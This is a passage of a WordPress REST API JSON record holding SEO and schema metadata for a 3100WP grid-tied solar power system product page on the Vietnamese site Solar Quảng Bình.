B\u00ecnh","description":"H\u1ec7 th\u1ed1ng \u0111i\u1ec7n n\u0103ng l\u01b0\u1ee3ng m\u1eb7t tr\u1eddi h\u00f2a l\u01b0\u1edbi 3100WP, ph\u00f9 h\u1ee3p cho h\u1ed9 gia \u0111\u00ecnh c\u00f3 ti\u00eau th\u1ee5 \u0111i\u1ec7n n\u0103ng t\u1eeb 2.500.000 \u2013 4.000.000VND\/th\u00e1ng. B\u00ean c\u1ea1nh \u0111\u00f3 c\u00f2n gi\u00fap gi\u1ea3m nhi\u1ec7t cho ng\u00f4i nh\u00e0 c\u1ee7a b\u1ea1n. H\u1ec7 th\u1ed1ng n\u00e0y ph\u00f9 h\u1ee3p, t\u1ed1i \u01b0u v\u1ec1 hi\u1ec7u qu\u1ea3 kinh t\u1ebf cho h\u1ed9 gia \u0111\u00ecnh t\u01b0\u01a1ng \u1ee9ng v\u1edbi m\u1ee9c \u0111i\u1ec7n n\u0103ng ti\u00eau th\u1ee5","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/solarquangbinh.com\/?product=he-thong-dien-mat-troi-hoa-luoi-3450wp","og_locale":"vi_VN","og_type":"article","og_title":"H\u1ec7 th\u1ed1ng \u0111i\u1ec7n m\u1eb7t tr\u1eddi h\u00f2a l\u01b0\u1edbi 3100WP - Solar Qu\u1ea3ng B\u00ecnh chuy\u00ean gi\u1ea3i ph\u00e1p v\u00e0 cung c\u1ea5p h\u1ec7 th\u1ed1ng \u0111i\u1ec7n m\u1eb7t tr\u1eddi h\u00f2a l\u01b0\u1edbi v\u00e0 l\u01b0u tr\u1eef t\u1ea1i Qu\u1ea3ng B\u00ecnh","og_description":"H\u1ec7 th\u1ed1ng \u0111i\u1ec7n n\u0103ng l\u01b0\u1ee3ng m\u1eb7t tr\u1eddi h\u00f2a l\u01b0\u1edbi 3100WP, ph\u00f9 h\u1ee3p cho h\u1ed9 gia \u0111\u00ecnh c\u00f3 ti\u00eau th\u1ee5 \u0111i\u1ec7n n\u0103ng t\u1eeb 2.500.000 \u2013 4.000.000VND\/th\u00e1ng. B\u00ean c\u1ea1nh \u0111\u00f3 c\u00f2n gi\u00fap gi\u1ea3m nhi\u1ec7t cho ng\u00f4i nh\u00e0 c\u1ee7a b\u1ea1n. H\u1ec7 th\u1ed1ng n\u00e0y ph\u00f9 h\u1ee3p, t\u1ed1i \u01b0u v\u1ec1 hi\u1ec7u qu\u1ea3 kinh t\u1ebf cho h\u1ed9 gia \u0111\u00ecnh t\u01b0\u01a1ng \u1ee9ng v\u1edbi m\u1ee9c \u0111i\u1ec7n n\u0103ng ti\u00eau th\u1ee5","og_url":"https:\/\/solarquangbinh.com\/?product=he-thong-dien-mat-troi-hoa-luoi-3450wp","og_site_name":"Solar Qu\u1ea3ng B\u00ecnh chuy\u00ean gi\u1ea3i ph\u00e1p v\u00e0 cung c\u1ea5p h\u1ec7 th\u1ed1ng \u0111i\u1ec7n m\u1eb7t tr\u1eddi h\u00f2a l\u01b0\u1edbi v\u00e0 l\u01b0u tr\u1eef t\u1ea1i Qu\u1ea3ng B\u00ecnh","article_modified_time":"2021-07-24T12:21:11+00:00","og_image":[{"width":225,"height":225,"url":"https:\/\/solarquangbinh.com\/wp-content\/uploads\/2018\/09\/images-5.jpg","type":"image\/jpeg"}],"twitter_card":"summary_large_image","twitter_misc":{"\u01af\u1edbc t\u00ednh th\u1eddi gian \u0111\u1ecdc":"3 ph\u00fat"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/solarquangbinh.com\/?product=he-thong-dien-mat-troi-hoa-luoi-3450wp","url":"https:\/\/solarquangbinh.com\/?product=he-thong-dien-mat-troi-hoa-luoi-3450wp","name":"H\u1ec7 th\u1ed1ng \u0111i\u1ec7n m\u1eb7t tr\u1eddi h\u00f2a l\u01b0\u1edbi 3100WP - Solar Qu\u1ea3ng B\u00ecnh chuy\u00ean gi\u1ea3i ph\u00e1p v\u00e0 cung c\u1ea5p h\u1ec7 th\u1ed1ng \u0111i\u1ec7n m\u1eb7t tr\u1eddi h\u00f2a l\u01b0\u1edbi v\u00e0 l\u01b0u tr\u1eef t\u1ea1i Qu\u1ea3ng B\u00ecnh","isPartOf":{"@id":"https:\/\/solarquangbinh.com\/#website"},"datePublished":"2018-09-01T04:19:51+00:00","dateModified":"2021-07-24T12:21:11+00:00","description":"H\u1ec7 th\u1ed1ng \u0111i\u1ec7n n\u0103ng l\u01b0\u1ee3ng m\u1eb7t tr\u1eddi h\u00f2a l\u01b0\u1edbi 3100WP, ph\u00f9 h\u1ee3p cho h\u1ed9 gia \u0111\u00ecnh c\u00f3 ti\u00eau th\u1ee5 \u0111i\u1ec7n n\u0103ng t\u1eeb 2.500.000 \u2013 4.000.000VND\/th\u00e1ng. B\u00ean c\u1ea1nh \u0111\u00f3 c\u00f2n gi\u00fap gi\u1ea3m nhi\u1ec7t cho ng\u00f4i nh\u00e0 c\u1ee7a b\u1ea1n. H\u1ec7 th\u1ed1ng n\u00e0y ph\u00f9 h\u1ee3p, t\u1ed1i \u01b0u v\u1ec1 hi\u1ec7u qu\u1ea3 kinh t\u1ebf cho h\u1ed9 gia \u0111\u00ecnh t\u01b0\u01a1ng \u1ee9ng v\u1edbi m\u1ee9c \u0111i\u1ec7n n\u0103ng ti\u00eau th\u1ee5","breadcrumb":{"@id":"https:\/\/solarquangbinh.com\/?product=he-thong-dien-mat-troi-hoa-luoi-3450wp#breadcrumb"},"inLanguage":"vi","potentialAction":[{"@type":"ReadAction","target":["https:\/\/solarquangbinh.com\/?product=he-thong-dien-mat-troi-hoa-luoi-3450wp"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/solarquangbinh.com\/?product=he-thong-dien-mat-troi-hoa-luoi-3450wp#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Trang ch\u1ee7","item":"https:\/\/solarquangbinh.com\/"},{"@type":"ListItem","position":2,"name":"S\u1ea3n ph\u1ea9m","item":"https:\/\/solarquangbinh.com\/?page_id=20"},{"@type":"ListItem","position":3,"name":"H\u1ec7 th\u1ed1ng \u0111i\u1ec7n m\u1eb7t tr\u1eddi h\u00f2a l\u01b0\u1edbi 3100WP"}]},{"@type":"WebSite","@id":"https:\/\/solarquangbinh.com\/#website","url":"https:\/\/solarquangbinh.com\/","name":"Solar Qu\u1ea3ng B\u00ecnh chuy\u00ean gi\u1ea3i ph\u00e1p v\u00e0 cung c\u1ea5p h\u1ec7 th\u1ed1ng \u0111i\u1ec7n m\u1eb7t tr\u1eddi h\u00f2a l\u01b0\u1edbi v\u00e0 l\u01b0u tr\u1eef t\u1ea1i Qu\u1ea3ng B\u00ecnh","description":"\u0110i\u1ec7n n\u0103ng l\u01b0\u1ee3ng m\u1eb7t tr\u1eddi Qu\u1ea3ng B\u00ecnh, Solar Quang Binh, Solar Qu\u1ea3ng B\u00ecnh chuy\u00ean cung c\u1ea5p h\u1ec7 th\u1ed1ng \u0111i\u1ec7n m\u1eb7t tr\u1eddi h\u00f2a l\u01b0\u1edbi v\u00e0 l\u01b0u tr\u1eef, pin n\u0103ng l\u01b0\u1ee3ng m\u1eb7t tr\u1eddi, Solar Quang Binh","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/solarquangbinh.com\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"vi"}]}},"_links":{"self":[{"href":"https:\/\/solarquangbinh.com\/index.php?rest_route=\/wp\/v3\/product\/1963"}],"collection":[{"href":"https:\/\/solarquangbinh.com\/index.php?rest_route=\/wp\/v3\/product"}],"about":[{"href":"https:\/\/solarquangbinh.com\/index.php?rest_route=\/wp\/v2\/types\/product"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/solarquangbinh.com\/index.php?rest_route=\/wp\/v2\/media\/2992"}],"wp:attachment":[{"href":"https:\/\/solarquangbinh.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1963"}],"wp:term":[{"taxonomy":"product_cat","embeddable":true,"href":"https:\/\/solarquangbinh.com\/index.php?rest_route=%2Fwp%2Fv2%2Fproduct_cat&post=1963"},{"taxonomy":"product_tag","embeddable":true,"href":"https:\/\/solarquangbinh.com\/index.php?rest_route=%2Fwp%2Fv2%2Fproduct_tag&post=1963"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}